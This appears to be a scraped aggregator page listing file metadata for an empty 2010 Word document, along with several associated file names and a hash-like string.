Author...................: captain
HyperlinksChanged........: No
LinksUpToDate............: No
LastModifiedBy...........: captain
HeadingPairs.............: Title, 1
Template.................: Normal.dotm
CharCountWithSpaces......: 0
CreateDate...............: 2010:08:22 10:37:00
CompObjUserType..........: Microsoft Office Word 97-2003 Document
ModifyDate...............: 2010:08:22 10:37:00
TitleOfParts.............:
Company..................:
Characters...............: 0
ScaleCrop................: No
CodePage.................: Windows Arabic
RevisionNumber...........: 2
MIMEType.................: application/msword
Words....................: 0
FileType.................: DOC
Lines....................: 1
AppVersion...............: 12.0
Security.................: None
Software.................: Microsoft Office Word
TotalEditTime............: 0
Pages....................: 1
CompObjUserTypeLen.......: 39
Paragraphs...............: 1


   1. speech.doc
   2. 1.do
   3. 1.doc
   4. file-3831515_
   5. 6a70e797617bb8958bfbe94a42374447e3859c6b4ef1e108d43a30b5db74
Viewing all 79 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>